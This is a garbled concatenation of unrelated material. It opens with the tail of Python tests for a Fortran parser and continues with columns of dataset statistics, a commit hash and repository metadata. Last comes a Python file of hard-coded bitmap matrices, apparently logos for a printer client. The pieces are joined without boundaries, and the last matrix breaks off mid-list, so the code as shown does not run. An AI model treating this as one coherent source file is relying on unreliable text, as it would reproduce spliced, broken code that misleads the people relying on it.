!BEGINSOURCE <cStringIO.StringI object at 0x1518de0> mode=free90
!comment line 1
!comment line 2
MODULE foo
!comment line 3
SUBROUTINE f()
!comment line 4
END SUBROUTINE f
!comment line 5
END MODULE foo
'''.strip().split('\n')[1:]
assert tree.asfix().strip().split('\n')[1:]=='''
C BEGINSOURCE <cStringIO.StringI object at 0x1630de0> mode=free90
C comment line 1
C comment line 2
MODULE foo
C comment line 3
SUBROUTINE f()
C comment line 4
END SUBROUTINE f
C comment line 5
END MODULE foo
'''.strip().split('\n')[1:]
def test_labels():
source_str = '''\
subroutine foo
real a
! Valid code:
100 a = 3
l: do
end do l
200 &! haa
a=4
300 l1: do
end do l1
end subroutine foo
'''
tree = parse(source_str, isfree=True, isstrict=False,
ignore_comments=False)
assert str(tree).strip().split('\n')[1:]=='''
!BEGINSOURCE <cStringIO.StringI object at 0x2952e70> mode=free90
SUBROUTINE foo()
REAL a
! Valid code:
100 a = 3
l: DO
END DO l
200 a = 4
! haa
300 l1: DO
END DO l1
END SUBROUTINE foo
'''.strip().split('\n')[1:]
source_str = '''\
subroutine foo
real a
! Valid code:
100 a = 3
l: do
end do l
200 ! haa
&a=4
300 l1: do
end do l1
end subroutine foo
'''
tree = parse(source_str, isfree=False, isstrict=False,
ignore_comments=False)
assert str(tree).strip().split('\n')[1:]=='''
! BEGINSOURCE <cStringIO.StringI object at 0x1d3b390> mode=fix90
SUBROUTINE foo()
REAL a
! Valid code:
100 a = 3
l: DO
END DO l
200 a = 4
! haa
300 l1: DO
END DO l1
END SUBROUTINE foo
'''.strip().split('\n')[1:]
| 32.847953
| 77
| 0.692541
| 798
| 5,617
| 4.859649
| 0.24812
| 0.042548
| 0.022692
| 0.024755
| 0.883187
| 0.852501
| 0.845797
| 0.845797
| 0.845797
| 0.845797
| 0
| 0.029594
| 0.223963
| 5,617
| 170
| 78
| 33.041176
| 0.86006
| 0.582517
| 0
| 0.762887
| 0
| 0
| 0.647033
| 0
| 0
| 0
| 0.015707
| 0
| 0.041237
| 1
| 0.020619
| false
| 0
| 0.010309
| 0
| 0.030928
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b0e74a656fd4aead33af652be0d33758e1925620
| 40,248
|
py
|
Python
|
logos.py
|
sakurakhadag/escp2-client
|
f8d58bdaedc4f7ca811769538586b759c37eb355
|
[
"MIT"
] | null | null | null |
logos.py
|
sakurakhadag/escp2-client
|
f8d58bdaedc4f7ca811769538586b759c37eb355
|
[
"MIT"
] | 5
|
2019-10-10T13:53:48.000Z
|
2019-10-16T19:09:28.000Z
|
logos.py
|
sakurakhadag/escp2-client
|
f8d58bdaedc4f7ca811769538586b759c37eb355
|
[
"MIT"
] | 2
|
2019-10-11T17:56:31.000Z
|
2021-01-15T11:33:58.000Z
|
def loadlogo(logo=1):
if logo == 1:
matrix = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]]
if logo == 2:
matrix = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0]]
return matrix
def load_logo_fast():
a = [[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 0, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0]]
b = [[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
